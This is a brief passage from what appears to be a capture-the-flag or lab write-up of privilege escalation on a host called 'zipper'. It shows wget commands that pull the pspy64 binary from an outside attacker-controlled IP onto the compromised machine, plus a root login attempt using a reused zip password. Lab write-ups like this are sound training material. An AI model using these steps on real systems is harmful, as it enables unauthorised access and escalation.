Priv Esc

www-data@zipper:/home$ cat /etc/crontab
www-data@zipper:/dev/shm$ wget 192.168.45.168/pspy
--2024-09-09 11:48:04--  http://192.168.45.168/pspy
Connecting to 192.168.45.168:80... connected.
HTTP request sent, awaiting response... 404 File not found
2024-09-09 11:48:04 ERROR 404: File not found.

www-data@zipper:/dev/shm$ wget 192.168.45.168/pspy64
--2024-09-09 11:48:08--  http://192.168.45.168/pspy64
Connecting to 192.168.45.168:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64              100%[===================>]   2.96M  6.36MB/s    in 0.5s    

2024-09-09 11:48:08 (6.36 MB/s) - ‘pspy64’ saved [3104768/3104768]

www-data@zipper:/dev/shm$ chmod +x pspy64 

Ran pspy again

Nothing special about the backups, so I just tried to su as root with the zip password.
